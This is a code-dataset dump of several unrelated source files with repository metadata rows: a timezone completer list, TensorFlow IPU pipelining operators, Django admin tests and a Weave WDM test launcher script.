"Newfoundland Standard Time", "North Asia East Standard Time", "North Asia Standard Time",
"Pacific SA Standard Time", "Pacific Standard Time", "Pacific Standard Time (Mexico)",
"Pakistan Standard Time", "Romance Standard Time", "Russian Standard Time",
"SA Eastern Standard Time", "SA Pacific Standard Time", "SA Western Standard Time",
"Samoa Standard Time", "SE Asia Standard Time", "Singapore Standard Time",
"South Africa Standard Time", "Sri Lanka Standard Time", "Taipei Standard Time",
"Tasmania Standard Time", "Tokyo Standard Time", "Tonga Standard Time", "Turkey Standard Time",
"US Eastern Standard Time", "US Mountain Standard Time", "UTC", "Venezuela Standard Time",
"Vladivostok Standard Time", "W. Australia Standard Time", "W. Central Africa Standard Time",
"W. Europe Standard Time", "West Asia Standard Time", "West Pacific Standard Time",
"Yakutsk Standard Time"]
@Completer
def get_supported_languages_for_create(cmd, prefix, namespace, **kwargs):
return _get_supported_languages()
@Completer
def get_supported_languages_for_update(cmd, prefix, namespace, **kwargs):
return _get_supported_languages()
def _get_supported_languages():
return languages
@Completer
def get_supported_timezones_for_create(cmd, prefix, namespace, **kwargs):
return _get_supported_timezones()
@Completer
def get_supported_timezones_for_update(cmd, prefix, namespace, **kwargs):
return _get_supported_timezones()
def _get_supported_timezones():
return timezones
| 59.294118
| 118
| 0.651538
|
26b3a2ce7c873906e0d643e437789a303bfa03dd
| 31,447
|
py
|
Python
|
tensorflow/python/ipu/ops/pipelining_ops.py
|
DebeshJha/tensorflow-1
|
2b5a225c49d25273532d11c424d37ce394d7579a
|
[
"Apache-2.0"
] | 2
|
2021-03-08T23:32:06.000Z
|
2022-01-13T03:43:49.000Z
|
tensorflow/python/ipu/ops/pipelining_ops.py
|
DebeshJha/tensorflow-1
|
2b5a225c49d25273532d11c424d37ce394d7579a
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/ipu/ops/pipelining_ops.py
|
DebeshJha/tensorflow-1
|
2b5a225c49d25273532d11c424d37ce394d7579a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Pipelining operators
~~~~~~~~~~~~~~~~~~~~
"""
# Function captures are based on /tensorflow/python/ops/cond_v2.py
from enum import IntEnum
from google.protobuf import json_format
from tensorflow.compiler.plugin.poplar.driver import pipeline_config_pb2
from tensorflow.compiler.plugin.poplar.ops import gen_functional_ops
from tensorflow.compiler.plugin.poplar.ops import gen_poputil_ops
from tensorflow.python.ipu import functional_ops
from tensorflow.python.ipu import ipu_infeed_queue
from tensorflow.python.ipu import ipu_outfeed_queue
from tensorflow.python.ipu import scopes
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import func_graph as func_graph_module
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util_v2 as util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import optimizer
class PipelineSchedule(IntEnum):
"""
The PipelineSchedule describes how stages are interleaved on the IPUs
servicing the pipeline. The forward and backward passes of each stage
will execute on the same IPUs. So, in the core of the pipeline there is a
choice as to whether to run the forward stages together, or the backward
stages and the forward stages together.
Attributes:
Grouped: This groups the forward passes on multiple IPUs. This requires
more memory since activations need to be stored until the backward
stages run together. However, since forward passes tend to be smaller
than backward passes, Grouped tends to improve the speed of the
execution, as different IPUs don't spend so much time waiting for each
other.
Interleaved: This schedules the backward passes whenever the forward
passes have just generated some activations. Consequently fewer
activations are required to be stored between the forward and backward
pipeline stages, so less memory is required. However, since forward
and backward stages tend to be very different in terms of execution
cycles, the overall performance of the pipeline tends to be slower.
Sequential: This is a debug mode, where the pipeline is scheduled in
the same way as if it were a sharded model.
"""
Grouped = 0
Interleaved = 1
Sequential = 2
class OptimizerFunctionOutput:
"""
A helper class used for returning a structured output from an
optimizer_function in a pipeline.
"""
def __init__(self, opt, loss):
"""Creates an OptimizerFunctionOutput object.
Args:
opt: An instance of `optimizer.Optimizer` which is used to generate
the back-propagation and the weight update pipeline stages.
loss: The loss which is passed to the optimizer.
"""
self.opt = opt
self.loss = loss
@property
def opt(self):
return self._opt
@opt.setter
def opt(self, value):
if not isinstance(value, optimizer.Optimizer):
raise TypeError(
"OptimizerFunctionOutput.opt must be a TensorFlow Optimizer "
"object.")
self._opt = value
@property
def loss(self):
return self._loss
@loss.setter
def loss(self, value):
if not isinstance(value, ops.Tensor):
raise TypeError(
"OptimizerFunctionOutput.loss must be a TensorFlow Tensor object.")
self._loss = value
class PipelineStageOptions:
"""
A helper class which can be used to configure Poplar compilation options (such
as 'availableMemoryProportion') inside a pipeline forward, backward and weight
update stage. This will override the global options set by
`ipu.utils.set_convolution_options` and `ipu.utils.set_matmul_options`.
"""
def __init__(self, convolution_options=None, matmul_options=None):
"""Creates an PipelineStageOptions object.
Args:
convolution_options: If provided, a dictionary of Poplar option flags for
all the convolution operations in the stage.
matmul_options: If provided, a dictionary of Poplar option flags for
all the matmul operations in the stage.
loss: The loss which is passed to the optimizer.
"""
convolution_options = convolution_options if convolution_options else {}
if not isinstance(convolution_options, dict):
raise TypeError(
"PipelineStageOptions.convolution_options must be dictionary.")
matmul_options = matmul_options if matmul_options else {}
if not isinstance(matmul_options, dict):
raise TypeError(
"PipelineStageOptions.matmul_options must be dictionary.")
# Add the values from the dicts into the proto.
self._proto = pipeline_config_pb2.PipelineStagePoplarConfig()
for (option_name, value) in convolution_options.items():
opt = self._proto.convolution_options.add()
opt.option = option_name
opt.value = value
for (option_name, value) in matmul_options.items():
opt = self._proto.matmul_options.add()
opt.option = option_name
opt.value = value
def get_proto(self):
return self._proto
def pipeline(computational_stages,
pipeline_depth,
repeat_count=1,
inputs=None,
infeed_queue=None,
outfeed_queue=None,
optimizer_function=None,
device_mapping=None,
pipeline_schedule=None,
forward_propagation_stages_poplar_options=None,
backward_propagation_stages_poplar_options=None,
weight_update_poplar_options=None,
offload_weight_update_variables=True,
continuous_weight_updates=False,
outfeed_loss=False,
name=None):
"""
Sets up a series of computational stages, where the outputs of one stage are
the inputs to the next one. These stages are then executed in parallel across
multiple IPUs. This approach can be used to split the model where layer(s)
are executed on different IPUs.
The first stage takes the `inputs` and the `infeed_queue` (if provided) as
its inputs. If the `infeed_queue` is provided, it is automatically dequeued
(similar to the ipu.loops API) therefore care needs to be taken to make sure
the signature of the first pipeline stage matches both the arguments from
`inputs` and the `infeed_queue`, otherwise an error is thrown.
All tensors which are used in the pipeline which are not TensorFlow
Variables need to be explicitly passed as inputs to the pipeline. If an
input does not change its value during the execution of the pipeline op
(for example hyperparameters such as learning rate), it needs to be passed
as part of `inputs`. Alternatively, if these values change during execution
(for example the model processes different batches of data) the input should
be passed through the `infeed_queue`
(see :class:`~tensorflow.python.ipu.ipu_infeed_queue.IPUInfeedQueue`).
When training a model, an optional `optimizer_function` function can be
provided. This function takes all the outputs from the last computational
stage as inputs, and returns an instance of `OptimizerFunctionOutput` that
is used to generate the backwards pass of the model using the TensorFlow
Optimizer API. This will internally create corresponding backpropagation
pipeline stages for each pipeline stage and colocate them such that the
activations and weights required for the gradient calculation and
application stay on the device in order to minimise the number of copies
between IPUs.
Note that the gradients, which are calculated by the `compute_gradients`
function, will be accumulated automatically during the execution of the
pipeline, unless `continuous_weight_updates` is enabled.
If the last computational stage has any outputs, then an `outfeed_queue`
(see :class:`~tensorflow.python.ipu.ipu_outfeed_queue.IPUOutfeedQueue`)
is required and all the outputs from the last computational stage are enqueued
to the `outfeed_queue`.
Note that pipelining also supports recomputation, to enable it, use the
`tensorflow.ipu.utils.set_recomputation_options()` function when configuring
the device.
For example a simple inference network for the MNIST can be split across two
IPUs:
.. code-block:: python
from tensorflow import keras
# Create the dataset
#...
# Create the data queues from/to IPU.
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset, "infeed")
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue("outfeed")
# Create a pipelined model which is split accross two stages.
def stage1(image):
partial = keras.layers.Dense(256, activation=tf.nn.relu)(image)
partial = keras.layers.Dense(128, activation=tf.nn.relu)(partial)
return partial
def stage2(partial):
logits = keras.layers.Dense(10)(partial)
probabilities = tf.nn.softmax(logits)
classes = tf.argmax(input=logits, axis=1)
return probabilities, classes
def model():
with variable_scope.variable_scope("vs", use_resource=True):
pipeline_op = pipelining_ops.pipeline(
computational_stages=[stage1, stage2],
pipeline_depth=250,
repeat_count=2,
inputs=[],
infeed_queue=infeed_queue,
outfeed_queue=outfeed_queue,
device_mapping=[3,1],
name="Pipeline")
return pipeline_op
with ops.device("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model, inputs=[])
outfeed_op = outfeed_queue.dequeue()
with tf.Session() as sess:
result = sess.run(compiled_model)
probabilities, classes = sess.run(outfeed_op)
In this set up, the model is split across two IPUs. By default the first two
layers would be executed on the first IPU and the third layer and the
probabilities and classes on the second IPU but here `device_mapping` is
used to override the default IPU allocation and instead the first two layers
will be executed on the fourth IPU and the third layer and the probabilities
and classed on the second IPU.
This creates a pipeline of depth 250 (specified by the `pipeline_depth`),
which means each pipeline stage is executed 250 times.
This pipeline is then executed 2 times (specified by the `repeat_count`)
The results of the pipeline (probabilities and classes) are returned to the
host by the outfeed queue.
We can also train this network by providing `optimizer_function`:
.. code-block:: python
from tensorflow import keras
# Create the dataset
#...
# Create the data queues from/to IPU.
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset, "infeed")
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue("outfeed")
# Create a pipelined model which is split accross two stages.
def stage1(lr, images, labels):
partial = keras.layers.Dense(256, activation=tf.nn.relu)(images)
partial = keras.layers.Dense(128, activation=tf.nn.relu)(partial)
return lr, partial, labels
def stage2(lr, partial, labels):
logits = keras.layers.Dense(10)(partial)
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
loss = tf.reduce_mean(cross_entropy)
return lr, loss
def optimizer_function(lr, loss):
optimizer = tf.train.GradientDescentOptimizer(lr)
return pipelining_ops.OptimizerFunctionOutput(optimizer, loss)
def model(lr):
with variable_scope.variable_scope("vs", use_resource=True):
pipeline_op = pipelining_ops.pipeline(
computational_stages=[stage1, stage2],
pipeline_depth=128,
repeat_count=10,
inputs=[lr],
infeed_queue=infeed_queue,
outfeed_queue=outfeed_queue,
optimizer_function=optimizer_function,
name="Pipeline")
return pipeline_op
with ops.device('cpu'):
lr = tf.placeholder(np.float16, [])
with ops.device("/device:IPU:0"):
compiled_model = ipu_compiler.compile(model, inputs=[lr])
outfeed_op = outfeed_queue.dequeue()
with tf.Session() as sess:
result = sess.run(compiled_model, {lr: 0.01})
losses = sess.run(outfeed_op)
Here the `tf.train.GradientDescentOptimizer` generates the pipeline stages
which calculate the gradients and apply them to the weights. Note how the
loss is returned to the host by the outfeed queue.
If a model requires multiple computational pipeline stages to access the same
`tf.Variable`, then all of these computational stages need to be placed on the
same IPU using the `device_mapping` argument.
Note that modifying `tf.Variable` values in a pipeline stage and/or during the
gradient calculation will result in undefined behavior. These variables can
only be modified by the `apply_gradients` member function of the applied
Optimizer.
Args:
computational_stages: a list of python functions, where each function
represents a computational pipeline stage. The function takes the
outputs of the previous pipeline state as its inputs.
pipeline_depth: the number of times each pipeline stage will be executed.
repeat_count: the number of times the pipeline will be executed.
inputs: arguments passed to the first pipeline stage.
infeed_queue: optional IPUInfeedQueue, if passed, it is dequeued and
passed as an input in the first pipeline stage.
outfeed_queue: IPUOutfeedQueue, required if the last computational stage
has any outputs. The outputs of these are enqueued to this queue and
they can be accessed on the host.
optimizer_function: optional Python function which takes the output of the
last computational stage as parameters and returns an instance of
`pipelining_ops.OptimizerFunctionOutput` in order to generate the
back-propagation and weight-update parts of the model suitable for
training.
device_mapping: If provided, a list of length equal to the number of
computational stages. An element at index `i` in the list represents which
IPU the computational stage `computational_stages[i]` should reside on.
This can be used to make sure computational stages which share
`tf.Variable`s are resident on the same IPU.
pipeline_schedule: Which scheduling algorithm to use for pipeline
lowering. Defaults to `PipelineSchedule.Grouped`.
forward_propagation_stages_poplar_options: If provided, a list of length
equal to the number of computational stages. Each element is a
PipelineStageOptions object which allows for fine grain control of the
Poplar options for a given forward propagation computational stage.
backward_propagation_stages_poplar_options: If provided, a list of length
equal to the number of computational stages. Each element is a
PipelineStageOptions object which allows for fine grained control of the
Poplar options for a given backward propagation computational stage.
weight_update_poplar_options: If provided, a PipelineStageOptions object
which allows for fine grained control of the Poplar options for the
weight update stage.
offload_weight_update_variables: If True, any `tf.Variable` which is
only used by the weight update of the pipeline (for example the
accumulator variable when using the `tf.MomentumOptimizer`), will be
stored in the remote memory. During the weight update this variable will
be streamed onto the device and then streamed back to the remote memory
after it has been updated. Requires the machine to be configured with
support for `Poplar remote buffers`. Offloading variables into remote
memory can reduce maximum memory liveness, but can also increase the
computation time of the weight update. Note that this option has no effect
for inference only pipelines.
continuous_weight_updates: ** CURRENTLY UNIMPLEMENTED ** When training,
this option will apply the gradients to the resource variables
immediately, rather than accumulating the gradients and applying them
at the end of each execution of the pipeline.
outfeed_loss: If True, the loss given by the `optimizer_function` will
be enqueued on the outfeed, instead of the outputs from the last
computational stage.
name: name of this pipeline.
Returns:
An `Operation` that executes the pipeline.
"""
name = name if name else "pipeline"
# Ensure inputs is a list, without casting inputs to a boolean. Casting
# a tf.Tensor to a boolean will be interpreted as an operation in the
# graph by Autograph.
inputs = inputs if not isinstance(inputs, type(None)) else []
inputs = functional_ops._convert_to_list(inputs) # pylint: disable=protected-access
inputs = ops.convert_n_to_tensor(inputs)
if continuous_weight_updates:
raise NotImplementedError(
"Continuous weight updates are currently not supported.")
for i, input in enumerate(inputs):
if input.dtype == dtypes.resource:
logging.warn("Passing tensor {} by value.".format(str(input)))
inputs[i] = input.value()
device_mapping = device_mapping if device_mapping else list(
range(0, len(computational_stages)))
if not isinstance(computational_stages, (list, tuple)):
raise TypeError(
"computational_stages argument needs to be a list or a tuple.")
if infeed_queue:
if not isinstance(infeed_queue, ipu_infeed_queue.IPUInfeedQueue):
raise TypeError("infeed_queue is not an instance of "
"ipu_infeed_queue.IPUOutfeedQueue")
if outfeed_queue:
if not isinstance(outfeed_queue, ipu_outfeed_queue.IPUOutfeedQueue):
raise TypeError("outfeed_queue is not an instance of "
"ipu_outfeed_queue.IPUOutfeedQueue")
# We expect at least one stage.
if len(computational_stages) < 2:
raise ValueError("Pipeline requires at least two computational stages.")
if not isinstance(device_mapping, (list, tuple)):
raise TypeError("device_mapping argument needs to be a list or a tuple.")
if len(device_mapping) != len(computational_stages):
raise ValueError(
"Each stage must be mapped to an IPU: %d mappings != %d stages" %
(len(device_mapping), len(computational_stages)))
if pipeline_schedule is None:
pipeline_schedule = PipelineSchedule.Grouped
if not isinstance(pipeline_schedule, PipelineSchedule):
raise TypeError("The given pipeline_schedule is not a member of the "
"PipelineSchedule enumeration.")
# TODO(T18660) interleaved schedule does not support multiple stages on the
# same IPU during training.
if pipeline_schedule == PipelineSchedule.Interleaved and len(
device_mapping) != len(set(device_mapping)) and optimizer_function:
raise NotImplementedError(
"The pipelining schedule 'Interleaved' does not currently support "
"multiple pipeline stages on the same device for training graphs. "
"Please use a different pipeline schedule.")
# Function for setting up and validating the per stage Poplar options.
def validate_stage_options_and_populate_proto(stages_poplar_options,
proto_list, name):
if stages_poplar_options is None:
stages_poplar_options = [
PipelineStageOptions() for i in range(len(computational_stages))
]
if not isinstance(stages_poplar_options, (list, tuple)):
raise TypeError(
"%s must be a list or a tuple of PipelineStageOptions objects." %
(name))
if len(stages_poplar_options) != len(computational_stages):
raise ValueError(
"%s must be a list or a tuple of PipelineStageOptions objects of "
"length %d (same number as the number of computational stages) but "
"is %d." %
(name, len(computational_stages), len(stages_poplar_options)))
for stage_options in stages_poplar_options:
if not isinstance(stage_options, PipelineStageOptions):
raise TypeError(
"Expected all elements of %s to be of type PipelineStageOptions, "
"but got %s instead." % (name, str(stage_options)))
for stage_options in stages_poplar_options:
proto_list.append(stage_options.get_proto())
pipeline_poplar_config = pipeline_config_pb2.PipelinePoplarConfig()
validate_stage_options_and_populate_proto(
forward_propagation_stages_poplar_options,
pipeline_poplar_config.forward_stages,
"forward_propagation_stages_poplar_options")
if optimizer_function:
validate_stage_options_and_populate_proto(
backward_propagation_stages_poplar_options,
pipeline_poplar_config.backward_stages,
"backward_propagation_stages_poplar_options")
if weight_update_poplar_options is None:
weight_update_poplar_options = PipelineStageOptions()
if not isinstance(weight_update_poplar_options, PipelineStageOptions):
raise TypeError(
"weight_update_poplar_options to be of type PipelineStageOptions, "
"but got %s instead." % (str(weight_update_poplar_options)))
pipeline_poplar_config.resource_update.CopyFrom(
weight_update_poplar_options.get_proto())
if outfeed_loss and not optimizer_function:
raise ValueError(
"An optimizer_function must be provided when outfeed_loss is True")
control_outputs = []
def _pipeline(*args):
outputs = args
for stage_id, stage in enumerate(computational_stages):
stage_infeed_queue = infeed_queue if stage_id == 0 else None
if stage_id == len(computational_stages) - 1 and not optimizer_function:
stage_outfeed_queue = outfeed_queue
else:
stage_outfeed_queue = None
stage_name = name + "_stage_" + str(stage_id)
outputs = _pipeline_stage(stage,
stage_id,
device_mapping[stage_id],
outputs,
infeed_queue=stage_infeed_queue,
outfeed_queue=stage_outfeed_queue,
name=stage_name)
if optimizer_function:
outputs = functional_ops._convert_to_list(outputs) # pylint: disable=protected-access
# Get the output from the optimizer function
opt_fn = optimizer_function(*outputs)
loss = opt_fn.loss
opt = opt_fn.opt
# Enqueue loss or any output tensors to the outfeed.
if outfeed_loss:
if not outfeed_queue:
raise ValueError(
"An outfeed_queue must be provided when outfeed_loss is True")
control_outputs.append(outfeed_queue.enqueue(opt_fn.loss))
elif outputs:
if not outfeed_queue:
raise ValueError(
"The last computational stage has tensor outputs: %s, but no"
" outfeed_queue has been provided." %
(', '.join(str(t) for t in outputs)))
control_outputs.append(outfeed_queue.enqueue(outputs))
# Call the compute gradients function - this will be automatically put
# into pipeline stages.
grads_and_vars = opt.compute_gradients(loss)
# Insert gradient accumulation ops.
accumulated_grads_and_vars = []
for grad, var in grads_and_vars:
if grad is not None:
with ops.colocate_with(grad):
# Create an accumulator - variable is used as reference for shape/layout.
accumulator = gen_poputil_ops.gradient_accumulator_create(var)
# Add the gradients to the accumulator.
accumulator = gen_poputil_ops.gradient_accumulator_add(
accumulator, grad)
# Sink the accumulators.
grad = gen_poputil_ops.gradient_accumulator_sink(
accumulator, num_mini_batches=pipeline_depth)
# Use the accumulated gradients.
accumulated_grads_and_vars.append((grad, var))
# Create an explicit function call for the apply gradients - note that we
# allow external caputres here.
apply_grad_ops = []
def resource_update_():
apply_grads = opt.apply_gradients(accumulated_grads_and_vars)
apply_grad_ops.append(apply_grads)
with ops.name_scope(name + "/WU") as scope:
func_graph, captured_args = functional_ops._compile_function( # pylint: disable=protected-access
resource_update_, [], scope, apply_grad_ops, True)
# Create the pipeline resource update stage and lower the function into XLA.
with ops.control_dependencies(list(func_graph.control_captures)):
outputs = gen_functional_ops.resource_update(
captured_args,
to_apply=util.create_new_tf_function(func_graph),
Tout=func_graph.output_types,
output_shapes=func_graph.output_shapes,
offload_weight_update_variables=offload_weight_update_variables,
num_batches_to_accumulate=pipeline_depth)
if not isinstance(outputs, ops.Operation):
if not outfeed_queue:
raise ValueError(
"The last computational stage has tensor outputs: %s, but no"
" outfeed_queue has been provided." % (', '.join(
str(t) for t in functional_ops._convert_to_list(outputs)))) # pylint: disable=protected-access
else:
raise ValueError(
"Expected the pipeline resource update stage to output a "
"tf.Operation, got %s instead." % (str(output)))
control_outputs.append(outputs)
with ops.name_scope(name) as scope:
# pylint: disable=protected-access
try:
func_graph, captured_args = functional_ops._compile_function(
_pipeline, inputs, scope, control_outputs)
except functional_ops._InvalidCaptureException as e:
raise ValueError(
"Trying to capture the tensor %s which is not a resource. This tensor"
" needs to be passed as either part of the `input` or `infeed_queue`"
" of the pipeline." % (str(e)))
# pylint: enable=protected-access
# Create the pipeline and lower the function into XLA.
with ops.control_dependencies(list(func_graph.control_captures)):
output = gen_functional_ops.pipeline(
captured_args,
to_apply=util.create_new_tf_function(func_graph),
Tout=func_graph.output_types,
output_shapes=func_graph.output_shapes,
pipeline_depth=pipeline_depth,
repeat_count=repeat_count,
schedule=int(pipeline_schedule),
pipeline_poplar_config=json_format.MessageToJson(
pipeline_poplar_config))
if not isinstance(output, ops.Operation):
raise ValueError(
"Expected the pipeline to output a tf.Operation, got %s instead." %
(str(output)))
return output
def _pipeline_stage(func,
stage_id,
device_id,
args,
infeed_queue=None,
outfeed_queue=None,
name=None):
"""Internal function for compiling a pipeline stage. This should not be called
directly and doing so will result in undefined behaviour.
Creates a pipeline stage.
Args:
func: function which will be executed as a stage.
stage_id: Stage number.
device_id: IPU the stage will be mapped to.
args: arguments to the function.
infeed_queue: optional IPUInfeedQueue, if passed, it is dequeued as part of
this function.
outfeed_queue: optional IPUOutfeedQueue, if passed, it is enqueued as part
of this function.
name: name of this pipeline sage.
Returns:
The values after execting func(args), or the control dependency if
outfeed_queue is not None.
"""
name = name if name else "pipeline_stage"
args = functional_ops._convert_to_list(args) # pylint: disable=protected-access
func_to_compile = func
control_outputs = []
# If we have an infeed, then we wrap the function in another function which
# dequeues the infeed.
if infeed_queue:
def infeed_func_wrapper(*args):
args = functional_ops._convert_to_list(args) # pylint: disable=protected-access
dequeue_ops = functional_ops._convert_to_list(infeed_queue._dequeue()) # pylint: disable=protected-access
# Deal with the dequeue depending on whether it's a list or dict.
if len(dequeue_ops) == 1 and isinstance(dequeue_ops[0], dict):
kwargs = dequeue_ops[0]
return func(*(args), **kwargs)
return func(*(args + dequeue_ops))
func_to_compile = infeed_func_wrapper
# If we have an outfeed, then we wrap the function in another function which
# enqueues the outfeed.
if outfeed_queue:
func = func_to_compile
def outfeed_func_wrapper(*args, **kwargs):
outputs = func(*args, **kwargs)
# Check if there are output tensors - if there are then enqueue them.
if not isinstance(outputs, ops.Operation):
if not isinstance(outputs, dict):
outputs = functional_ops._convert_to_list(outputs) # pylint: disable=protected-access
outputs = outfeed_queue.enqueue(outputs)
control_outputs.append(outputs)
func_to_compile = outfeed_func_wrapper
with ops.name_scope(name) as scope:
# pylint: disable=protected-access
try:
func_graph, captured_args = functional_ops._compile_function(
func_to_compile, args, scope, control_outputs)
except functional_ops._InvalidCaptureException as e:
raise ValueError(
"Trying to capture the tensor %s which is not a resource. This tensor"
" needs to be passed as either part of the `input` or `infeed_queue`"
" of the pipeline." % (str(e)))
# pylint: enable=protected-access
# Create the pipeline stage and lower the function into XLA.
with ops.control_dependencies(list(func_graph.control_captures)):
with scopes.ipu_shard(device_id):
outputs = gen_functional_ops.pipeline_stage(
captured_args,
to_apply=util.create_new_tf_function(func_graph),
Tout=func_graph.output_types,
output_shapes=func_graph.output_shapes,
stage_id=stage_id)
if isinstance(outputs, ops.Operation):
return outputs
return func_graph_module.pack_sequence_as(func_graph.structured_outputs,
outputs)
| 42.553451
| 112
| 0.705854
|
c2d7fda69d41540373249fbd989048982b52cfbf
| 1,392
|
py
|
Python
|
app/core/tests/test_admin.py
|
mamirjamali/recepe_lon_dev
|
cacb5e14f11b10b48bfe3b8592174058e9607ee2
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
mamirjamali/recepe_lon_dev
|
cacb5e14f11b10b48bfe3b8592174058e9607ee2
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
mamirjamali/recepe_lon_dev
|
cacb5e14f11b10b48bfe3b8592174058e9607ee2
|
[
"MIT"
] | null | null | null |
# from django import urls
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email="admin@enviroble.com",
password="12qwaszxxzsa"
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email="test@enviroble.com",
password="12qwaszxxzsa",
name="Test user full name"
)
def test_user_listed(self):
"""Test if users are listed in user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
"""Test that the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| 32.372093
| 69
| 0.624282
|
42e696aa6c7e63f4b6ed0b4030965dff515ec2d8
| 5,920
|
py
|
Python
|
src/test-apps/happy/bin/weave-wdm-next.py
|
aiw-google/openweave-core
|
5dfb14b21d0898ef95bb62ff564cadfeea4b4702
|
[
"Apache-2.0"
] | 1
|
2021-08-10T12:08:31.000Z
|
2021-08-10T12:08:31.000Z
|
src/test-apps/happy/bin/weave-wdm-next.py
|
aiw-google/openweave-core
|
5dfb14b21d0898ef95bb62ff564cadfeea4b4702
|
[
"Apache-2.0"
] | 1
|
2019-03-26T04:47:32.000Z
|
2019-03-26T04:47:32.000Z
|
src/test-apps/happy/bin/weave-wdm-next.py
|
aiw-google/openweave-core
|
5dfb14b21d0898ef95bb62ff564cadfeea4b4702
|
[
"Apache-2.0"
] | 1
|
2021-03-16T03:22:52.000Z
|
2021-03-16T03:22:52.000Z
|
#!/usr/bin/env python
#
# Copyright (c) 2016-2017 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# A Happy command line utility that tests Weave Wdm Next among Weave nodes.
#
# The command is executed by instantiating and running WeaveWdmNext class.
#
import getopt
import sys
import set_test_path
from happy.Utils import *
import WeaveWdmNext
helpstring = \
"""
weave-wdm-next [-h --help] [-q --quiet] [-o --origin <NAME>] [-s --server <NAME>] [-t --tap <TAP_INTERFACE>]
[-w --wdm_option <wdm_option>] [-t --test_case <test_case>] [--test_client_case <case_id>] [--total_client_count <count>):
[--final_client_status <status>][--timer_client_period <period>] [--enable_client_stop][--test_client_iterations <iterations>]
[--test_client_delay <delay_time>] [--enable_client_flip][--save_client_perf][--test_server_case <case_id>]
[--total_server_count <count>][--final_server_status <status>]
[--timer_server_period] <period>[--enable_server_stop][--test_server_iterations <iterations>]
[--test_server_delay <delay_time>][--enable_server_flip][--save_server_perf][--test_focus_client]
[--case][--case_cert_path <path>][--case_key_path <path>][--group_enc][--group_enc_key_id <key>]
return:
True or False for test
"""
if __name__ == "__main__":
options = WeaveWdmNext.option()
try:
opts, args = getopt.getopt(sys.argv[1:], "ho:s:qt:w:",
["help", "origin=", "server=", "quiet", "tap=", "wdm_option=",
"test_client_case=", "total_client_count=", "final_client_status=", "timer_client_period=",
"enable_client_stop=", "test_client_iterations=", "test_client_delay=","enable_client_flip=",
"save_client_perf="
"test_server_case=", "total_server_count=", "final_server_status=", "timer_server_period=",
"enable_server_stop=", "test_server_iterations=", "test_server_delay=", "enable_server_flip=",
"save_server_perf=", "swap_role=", "case", "case_cert_path=", "case_key_path=", "group_enc", "group_enc_key_id="])
except getopt.GetoptError as err:
print WeaveWdmNext.WeaveWdmNext.__doc__
print hred(str(err))
sys.exit(hred("%s: Failed server parse arguments." % (__file__)))
for o, a in opts:
if o in ("-h", "--help"):
print helpstring
sys.exit(0)
elif o in ("-q", "--quiet"):
options["quiet"] = True
elif o in ("-o", "--origin"):
options["client"] = a
elif o in ("-s", "--server"):
options["server"] = a
elif o in ("-t", "--tap"):
options["tap"] = a
elif o in ("-w", "--wdm_option"):
options["wdm_option"] = a
elif o in ("--test_client_case"):
options["test_client_case"] = int(a)
elif o in ("--total_client_count"):
options["total_client_count"] = int(a)
elif o in ("--final_client_status"):
options["final_client_status"] = int(a)
elif o in ("--timer_client_period"):
options["timer_client_period"] = int(a)
elif o in ("--enable_client_stop"):
options["enable_client_stop"] = int(a)
elif o in ("--test_client_iterations"):
options["test_client_iterations"] = int(a)
elif o in ("--test_client_delay"):
options["test_client_delay"] = int(a)
elif o in ("--enable_client_flip"):
options["enable_client_flip"] = int(a)
elif o in ("--save_client_perf"):
options["save_client_perf"] = int(a)
elif o in ("--test_server_case"):
options["test_server_case"] = int(a)
elif o in ("--total_server_count"):
options["total_server_count"] = int(a)
elif o in ("--final_server_status"):
options["final_server_status"] = int(a)
elif o in ("--timer_server_period"):
options["timer_server_period"] = int(a)
elif o in ("--enable_server_stop"):
options["enable_server_stop"] = int(a)
elif o in ("--test_server_iterations"):
options["test_server_iterations"] = int(a)
elif o in ("--test_server_delay"):
options["test_server_delay"] = int(a)
elif o in ("--enable_server_flip"):
options["enable_server_flip"] = int(a)
elif o in ("--save_server_perf"):
options["save_server_perf"] = int(a)
elif o in ("--test_focus_client"):
options["swap_role"] = int(a)
elif o in ("--case"):
options["case"] = True
elif o in ("--case_cert_path"):
options["case_cert_path"] = a
elif o in ("--case_key_path"):
options["case_key_path"] = a
elif o in ("--group_enc"):
options["group_enc"] = True
elif o in ("--group_enc_key_id"):
options["group_enc_key_id"] = a
else:
print hred(str(o) + " cannot be recognized")
assert False, "unhandled option"
